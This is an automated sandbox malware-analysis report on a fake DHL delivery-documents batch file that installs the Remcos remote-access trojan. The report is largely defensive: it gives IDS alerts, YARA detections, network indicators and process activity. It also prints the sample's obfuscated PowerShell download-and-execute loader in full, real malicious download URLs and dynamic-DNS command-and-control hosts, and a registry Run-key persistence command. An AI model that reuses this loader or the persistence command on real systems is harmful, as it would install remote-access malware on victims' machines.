              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOrganyK,nge.UnproHFreelePantaaparasdBritaeNerirrUopfosSl to[B,llf$Eme,rTPr d

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-07T18:41:54.000325+010020365941Malware Command and Control Activity Detected192.168.2.449723192.169.69.2657483TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-07T18:41:34.447638+010020327761Malware Command and Control Activity Detected192.168.2.449722192.169.69.2657484TCP
              2025-03-07T18:41:55.458789+010020327761Malware Command and Control Activity Detected192.168.2.449724192.169.69.2657484TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-07T18:41:13.650752+010028032702Potentially Bad Traffic192.168.2.44972127.124.114.163443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: awb_post_dhl_delivery_documents_07_03_2025_000000000000000.batVirustotal: Detection: 13%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7256, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hsGaonspt.dat, type: DROPPED
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
              Source: unknownHTTPS traffic detected: 27.124.114.163:443 -> 192.168.2.4:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 27.124.114.163:443 -> 192.168.2.4:49721 version: TLS 1.2
              Source: Binary string: stem.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1971988827.0000000007314000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 0000000A.00000002.1971988827.000000000737C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdbW source: powershell.exe, 0000000A.00000002.1938539115.0000000000B93000.00000004.00000020.00020000.00000000.sdmp

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49722 -> 192.169.69.26:57484
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49723 -> 192.169.69.26:57483
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49724 -> 192.169.69.26:57484
              Uses dynamic DNS services
              Source: unknownDNS query: name: ortain7histas2.duckdns.org
              Source: unknownDNS query: name: ortain7histas1.duckdns.org
              Source: unknownDNS query: name: ortain7histas3.duckdns.org
              Source: unknownDNS query: name: ortain7histas4.duckdns.org
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewIP Address: 27.124.114.163 27.124.114.163
              Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49721 -> 27.124.114.163:443
              Source: global trafficHTTP traffic detected: GET /admin-user/Telefonkder.fla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: planachiever.auConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /admin-user/pyeavywobFmAGe13.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: planachiever.auCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /admin-user/Telefonkder.fla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: planachiever.auConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /admin-user/pyeavywobFmAGe13.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: planachiever.auCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: planachiever.au
              Source: global trafficDNS traffic detected: DNS query: ortain7histas1.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: ortain7histas2.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: ortain7histas3.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: ortain7histas4.duckdns.org
              Source: powershell.exe, 00000002.00000002.1453273914.0000021360A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.1424520874.0000021350C3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1424520874.0000021350A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1941362212.00000000048B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.1424520874.0000021350C3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1424520874.0000021350A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000A.00000002.1941362212.00000000048B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.1453273914.0000021360A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.1453273914.0000021360A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.1453273914.0000021360A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.1424520874.0000021350C3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1453273914.0000021360A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.a
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424520874.0000021350C3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1424520874.0000021352BB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/a
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/ad
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/adm
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admi
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-u
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-us
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-use
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/T
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Te
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Tel
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Tele
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Telef
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Telefo
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Telefon
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Telefonk
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Telefonkd
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Telefonkde
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Telefonkder
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Telefonkder.
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Telefonkder.f
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Telefonkder.fl
              Source: powershell.exe, 00000002.00000002.1424520874.0000021351DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Telefonkder.fla
              Source: powershell.exe, 00000002.00000002.1424520874.0000021350C3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Telefonkder.flaP
              Source: powershell.exe, 0000000A.00000002.1941362212.0000000004A07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/Telefonkder.flaXR
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2514364435.00000000223F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/pyeavywobFmAGe13.bin
              Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://planachiever.au/admin-user/pyeavywobFmAGe13.binZ
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownHTTPS traffic detected: 27.124.114.163:443 -> 192.168.2.4:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 27.124.114.163:443 -> 192.168.2.4:49721 version: TLS 1.2

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7256, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hsGaonspt.dat, type: DROPPED

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_8052.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7304, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8052, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Sample has a suspicious name (potential lure to open the executable)
              Source: awb_post_dhl_delivery_documents_07_03_2025_000000000000000.batStatic file information: Suspicious name
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DADB8F22_2_00007FFC3DADB8F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DADAB8B2_2_00007FFC3DADAB8B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DBA9E4A2_2_00007FFC3DBA9E4A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DBA89252_2_00007FFC3DBA8925
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0482E6A810_2_0482E6A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0482EF7810_2_0482EF78
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0482E36010_2_0482E360
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Afbenyt" /t REG_EXPAND_SZ /d "%Pigling% -windowstyle 1 $Kolumners112=(gi 'HKCU:\Software\Abanga62\').GetValue('metanetwork');%Pigling% ($Kolumners112)"
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6488
              Source: unknownProcess created: Commandline size = 6512
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6488Jump to behavior
              Source: amsi32_8052.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7304, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 8052, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.evad.winBAT@14/10@5/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\preconversion.PriJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\hoijuHgetgtso-VDU43F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjktfdzu.fog.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\awb_post_dhl_delivery_documents_07_03_2025_000000000000000.bat" "
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7304
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8052
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: awb_post_dhl_delivery_documents_07_03_2025_000000000000000.batVirustotal: Detection: 13%
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\awb_post_dhl_delivery_documents_07_03_2025_000000000000000.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOrganyK,nge.UnproHFreelePa
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava 